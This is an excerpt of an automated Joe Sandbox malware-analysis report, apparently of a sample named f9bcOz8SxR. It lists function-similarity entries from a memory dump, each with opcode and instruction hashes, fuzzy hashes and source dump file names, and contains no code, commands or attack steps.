                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                                                • Instruction ID: aed6eacc40b0d3e1b76abcabcbb9f378fa09ca89ea130d45577a8787e2bf5b0e
                                                                • Opcode Fuzzy Hash: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                                                • Instruction Fuzzy Hash: 25121D37B515198FEB44DEA5D8483DBB3A2FF9C318F6A9534CD48AB607C635B502CA80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 91bc785382ea1752cd4942329a38c54be285c6b2eaf9f5d0d59e9c50a757d9ad
                                                                • Instruction ID: 70991ef64455c8c9e4e204886435f079be533317a9f2c2e6dda502517a747d02
                                                                • Opcode Fuzzy Hash: 91bc785382ea1752cd4942329a38c54be285c6b2eaf9f5d0d59e9c50a757d9ad
                                                                • Instruction Fuzzy Hash: 5DE125309083198FD324EF19C48036ABBE2FB85354F24852DE499CB3D9D779ED469BA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ff8ccdd5b0ece7a5cb6af580955fb437ec7d9ab898e51f4a572766b39538e950
                                                                • Instruction ID: 0ac630b4468b3f3f3b58c556f3a2c2d5488a007995b48f3b7ef8cdbbffafd8cc
                                                                • Opcode Fuzzy Hash: ff8ccdd5b0ece7a5cb6af580955fb437ec7d9ab898e51f4a572766b39538e950
                                                                • Instruction Fuzzy Hash: FEC17FB1605602CBC328CF19C4D0265F7E1FF91720F2946AED5AA8F782E734E985CB85
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                                                • Instruction ID: 1733cd81a4e5140a6bf1758cf07126fa1752cf941a1bf6abd925b4cdbc639026
                                                                • Opcode Fuzzy Hash: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                                                • Instruction Fuzzy Hash: B3A11671A083124FC714CF2DC8C062AB7E6AFC9351F59862DE995973A1E735DC4A8B81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
                                                                • Instruction ID: 924d6743562582b16038b9d89937607bd7bea1581ebcd3f2a0698b21fbbc4f2a
                                                                • Opcode Fuzzy Hash: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
                                                                • Instruction Fuzzy Hash: 45A19475A011598FDB38DE25CC81FDA73A6EFC8310F0A8525ED599F3D1EA30AD458B80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 778489d7c75676053f026604bdc224504bc0de50efdbe53cb77c4d97abee7a04
                                                                • Instruction ID: 0fa2a35652b9182076c8249ac88fbf5a92992bbca3af4db7bf4929f7164dc963
                                                                • Opcode Fuzzy Hash: 778489d7c75676053f026604bdc224504bc0de50efdbe53cb77c4d97abee7a04
                                                                • Instruction Fuzzy Hash: BCC1F7B1919B419BD362CF38C881BEAF7E1BFD9300F108A1DE5EA96251EB707584CB51
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6edf3ddf8f5213f3413fb1d709d3bc670c0fa7b607db7403283473b720073f0
                                                                • Instruction ID: 732c6d4d4fcc5fd232b32ba1dee6bbffa5101864b9f70eee1b3d8a6927f07430
                                                                • Opcode Fuzzy Hash: a6edf3ddf8f5213f3413fb1d709d3bc670c0fa7b607db7403283473b720073f0
                                                                • Instruction Fuzzy Hash: 2D712BB22086600BDB19492D888037FA7D75BC6315F994A6EE5F9C73C5CA31CD43D791
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 775f853bcf1868de5edefecaa0269042ca7191f4d9fc1529e7e42513f305e00f
                                                                • Instruction ID: 76b5e7d356bdb7da73892e0688157679f2eadc8f876599907c70121016da01e0
                                                                • Opcode Fuzzy Hash: 775f853bcf1868de5edefecaa0269042ca7191f4d9fc1529e7e42513f305e00f
                                                                • Instruction Fuzzy Hash: 3B81C761D0DB8497E6219B359A417BBB3E4AFE9344F099B18BD8C52113FB30B9D8C352
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9aafd895ebe90f471381034e53a0fcbf2d9c78c74a8935e0395ddd4caa61b5fa
                                                                • Instruction ID: 38b9bcddef3a73a7cfebeeb7906c878d75116f0efddb6a7f02f5f2bf5e0f833c
                                                                • Opcode Fuzzy Hash: 9aafd895ebe90f471381034e53a0fcbf2d9c78c74a8935e0395ddd4caa61b5fa
                                                                • Instruction Fuzzy Hash: 62710436A08705CBC7109F19D89022AF7E1EF95364F1A876EE89947391E334ED558B81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f44d503f7ca8bea9f40099ab1a1c8c42880d5fd10c3854e17a624ffebaa00470
                                                                • Instruction ID: 63aa4853ec40451856089635e620a62ea506c23ba4e52c3fb5739aa1cd6090fd
                                                                • Opcode Fuzzy Hash: f44d503f7ca8bea9f40099ab1a1c8c42880d5fd10c3854e17a624ffebaa00470
                                                                • Instruction Fuzzy Hash: 7681E872D18BC28BD3158F29C8906B6B7E0FFDA314F144B5EE9E606782E7B49581C741
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f9a13e5d860fa34c721b2c40ee2c43aae5957d7ba7b2d5b7e3b7568c40334a0
                                                                • Instruction ID: e4b4b763354e4a0b9a8d13f8db8979735c6eaf309638c25a75dd24f20b287b4f
                                                                • Opcode Fuzzy Hash: 6f9a13e5d860fa34c721b2c40ee2c43aae5957d7ba7b2d5b7e3b7568c40334a0
                                                                • Instruction Fuzzy Hash: F981F872D14BC28BD3248F25C8806B6B7E0FFEA350F14976EE8E616742E7749581C740
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a113ecdab3288630ededd4f887934456975082035c092f9ae0977508b6761685
                                                                • Instruction ID: 99bb535c1cec7ba51d6ad923c0daafef4c60fa8a74add11ed00bf9ddc5d153e5
                                                                • Opcode Fuzzy Hash: a113ecdab3288630ededd4f887934456975082035c092f9ae0977508b6761685
                                                                • Instruction Fuzzy Hash: B0616872D083848BD3119F2888806797BE2EFC6754F2583ADFD955B353E7749A45C340
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5129f65fd52d79a6b5e7ba13d21ca7e84aa44fff0cd4be18537d6295c80d2f9d
                                                                • Instruction ID: c7a34b31f037cf44c6d13def0d5d93fadd54afaf1c948b4349178522e7c29768
                                                                • Opcode Fuzzy Hash: 5129f65fd52d79a6b5e7ba13d21ca7e84aa44fff0cd4be18537d6295c80d2f9d
                                                                • Instruction Fuzzy Hash: 1041F173F206280BE34CD96E9CA526A73C297C4310F4A463DDA96C77C2EC74DD1692D0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                                • Instruction ID: 9689be6eea3213fbaa21e482f8c21efc5d853acaba3e4d13982ded4ef55fe73d
                                                                • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                                • Instruction Fuzzy Hash: 6331903170831E4BCB14AE6AC4C422BF6D29BD8764F55C63DE99AC33C0EA719C49D782
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                                • Instruction ID: a45c14efcbc2a439fe1014f62a1e80b1a1067ca4ce95348fb486a6658c85eeb8
                                                                • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                                • Instruction Fuzzy Hash: 80F04F73B656290B9360CDB66D011D6B2C3A7C0770F6F85A5EC84D7542E9349C4686C6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                                • Instruction ID: 8a36770854eaec19434339c693afc3a1ecfd1e817f3a987f66b4f0476542e2c8
                                                                • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                                • Instruction Fuzzy Hash: 2BF01C33A20A344B6360CD7A8D05597A2D797C86B0B1FC969ECA5E7206E930EC0656D5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dde8d1f0f6987bf3a1af0e0c3afbb7e075d581939189aaaba2ade72773a283ea
                                                                • Instruction ID: c72cdc96dd98f86fdcee64c6e67e06110aca880780d43c0913d983901f738c37
                                                                • Opcode Fuzzy Hash: dde8d1f0f6987bf3a1af0e0c3afbb7e075d581939189aaaba2ade72773a283ea
                                                                • Instruction Fuzzy Hash: 37B012329022004F9F06CA37DC7109232B673D5300359C4EED10345030D635D0178600
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [
                                                                • API String ID: 0-784033777
                                                                • Opcode ID: 252e8896ad6d3741da5794c528197c2ee92bb55229d97acf00dd3dec925a6bb1
                                                                • Instruction ID: 1d8f0501fc9ac7b985c2630c57b5debcf774face257d3a7635488d9beb717d28
                                                                • Opcode Fuzzy Hash: 252e8896ad6d3741da5794c528197c2ee92bb55229d97acf00dd3dec925a6bb1
                                                                • Instruction Fuzzy Hash: D0B167719083D56BDB349A27889073B7BD8FFB73A4F28052DE8C5C6182FB25D8648352
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: islower
                                                                • String ID: $
                                                                • API String ID: 3326879001-3993045852
                                                                • Opcode ID: 18ba9fa8bab586d7f32a82e34484789797b07a257a6a49381d64b3f4f747a4c4
                                                                • Instruction ID: 12c39f72716d021bbdc128f5880f4c03dc6b3a2d8e15cb4b09fef3c1474eea77
                                                                • Opcode Fuzzy Hash: 18ba9fa8bab586d7f32a82e34484789797b07a257a6a49381d64b3f4f747a4c4
                                                                • Instruction Fuzzy Hash: 6E61A3706083458BC714DF69C88022EFBE2AFC5754F248A2DE4A58B3E1EB74DE45DB46